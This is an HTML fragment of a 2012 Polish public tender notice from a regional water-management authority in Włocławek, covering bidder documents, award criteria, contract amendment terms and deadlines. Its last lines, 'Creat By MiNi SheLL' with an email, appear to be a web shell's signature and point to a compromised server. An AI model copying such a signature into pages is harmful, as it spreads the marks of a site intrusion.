<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ust. 1 ustawy , przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy (w formie aneksu), w przypadkach wystąpienia okoliczności wymienionych we wzorze umowy, z uwzględnieniem podanych warunków ich wprowadzenia.
Zamawiający dopuszcza możliwość istotnych zmian Umowy, w stosunku do treści Oferty  jedynie  w  przypadku     wystąpienia  przesłanek, o  których  mowa  w  art.  144  ust. 1  p.z.p  jedynie w zakresie terminu  wykonania  przedmiotu  umowy, danych  rejestrowych  Wykonawcy,  ustanowionych pełnomocników  stron  oraz  zwaloryzowania  wartości  wynagrodzenia Wykonawcy  wynikającego  ze 
zmiany urzędowych stawek podatku od towarów i usług (VAT). 
Warunkiem wprowadzenia zmiany terminu wykonania przedmiotu umowy jest wystąpienie okoliczności niezależnych  od  stron  Umowy,  uniemożliwiających  wykonanie  Umowy  w  terminie  pierwotnym. Obowiązek udokumentowania wystąpienia okoliczności uzasadniających zmianę terminu wykonania 
przedmiotu umowy ciąży na stronie umowy wnioskującej o wprowadzenie zmiany. 
Za okoliczności uniemożliwiające wykonanie przedmiotu umowy w terminie uznaje się w szczególności: 
a)  działanie siły wyższej, 
b)  brak  możliwości  ustalenia  stanu  prawnego  nieruchomości  w  odniesieniu  do  prawa własności, 
c)przedłużenie  procedur  administracyjnych  koniecznych  do  przeprowadzenia  w  celu wykonania  przedmiotu  umowy  ponad  terminy  ustawowe,  określone  w  kodeksie postępowania administracyjnego [ k.p.a.]  z przyczyn niezależnych od Wykonawcy pod warunkiem  dopełnienia  przez  Wykonawcę  wszelkich  wymogów  formalno-prawnych, proceduralnych oraz dochodzenia terminów, wynikających z tych procedur, 
d)zmiany  planu  finansowego  Zamawiającego  dotyczących  środków  finansowych, 
przeznaczonych na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorski Zarząd Melioracji i Urządzeń Wodnych we Włocławku, ul. Okrzei 74a, 87-800 Włocławek, w pokoju 34 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 10:00, miejsce: Kujawsko-Pomorski Zarząd Melioracji i Urządzeń Wodnych we Włocławku, ul. Okrzei 74a, 87-800 Włocławek, w pokoju 34 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com